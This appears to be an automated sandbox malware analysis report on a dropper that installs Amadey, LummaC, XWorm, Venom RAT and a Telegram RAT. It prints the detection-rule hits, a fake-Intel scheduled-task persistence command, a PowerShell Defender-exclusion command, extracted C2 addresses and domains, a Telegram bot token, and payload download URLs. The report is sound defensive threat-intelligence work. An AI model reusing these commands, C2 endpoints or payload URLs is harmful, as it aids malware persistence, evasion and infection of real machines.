                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1540, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 6964, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1540, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 6964, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeAvira: detection malicious, Label: HEUR/AGEN.1313061
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exeAvira: detection malicious, Label: HEUR/AGEN.1313061
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Mutex": "hgzuiajogwnqs", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kFccRRCzW3jG/otfy1Jkj43o0+4OxnCs1oCpmxYTk3m7JpGlsS6RGQjGzdX6D5uOIuCbvZ6LcErP2gcbdu30OOKRo2h1VjJW/J05YD4xFgwBHdMxA1DXT6Q4kwhO3cK5KTA9hcSqIF+Z0LOI9nl3fyGZmlcmxLX5iHGRq64bny8=", "External_config_on_Pastebin": "https://pastebin.com/raw/dDuwSpUA"}
                    Source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.200.149.15"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Source: vQeyqr1.exe.6500.14.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage"}
                    Source: 950932ab59.exe.424.52.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "energyaffai.lat", "rapeflowwj.lat", "grannyejh.lat"], "Build id": "PvbArZ--"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeReversingLabs: Detection: 27%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeReversingLabs: Detection: 56%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exeReversingLabs: Detection: 66%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exeReversingLabs: Detection: 56%
                    Source: C:\Users\user\AppData\Local\Temp\1018906001\003.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exeReversingLabs: Detection: 66%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 69%
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmpString decryptor: PvbArZ--
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: 45.200.149.15
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: 7000
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: <123456789>
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: <Xwormmm>
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: XWorm V5.6
                    Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackString decryptor: USB.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Binary string: Unhook.pdb source: RzAAR0y.exe, 0000000B.00000002.4692082681.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp, RzAAR0y.exe, 0000000B.00000000.2790737030.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp
                    Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: 2gwmtZs.exe, 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: sustainskelet.lat
                    Source: Malware configuration extractorURLs: sweepyribs.lat
                    Source: Malware configuration extractorURLs: crosshuaht.lat
                    Source: Malware configuration extractorURLs: aspecteirs.lat
                    Source: Malware configuration extractorURLs: discokeyus.lat
                    Source: Malware configuration extractorURLs: necklacebudi.lat
                    Source: Malware configuration extractorURLs: energyaffai.lat
                    Source: Malware configuration extractorURLs: rapeflowwj.lat
                    Source: Malware configuration extractorURLs: grannyejh.lat
                    Source: Malware configuration extractorURLs: 45.200.149.15
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E7E0C0 recv,recv,recv,recv,1_2_00E7E0C0
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
                    Source: skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php907001
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php911001
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpB
                    Source: skotes.exe, 00000009.00000003.3988275528.00000000015BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZk)
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpv
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpz
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/dkk
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/inr
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/t
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1434988227/vQeyqr1.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/6165238488/RzAAR0y.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/2gwmtZs.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/Krokodyl02/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe;U
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exeQU
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/karl/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/karl/random.exeZ
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/loadman/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exeBU
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exeN
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exej
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/zhigarko/random.exe
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/zhigarko/random.exewU
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: 950932ab59.exe, 00000034.00000003.3458081477.000000000155F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro8
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
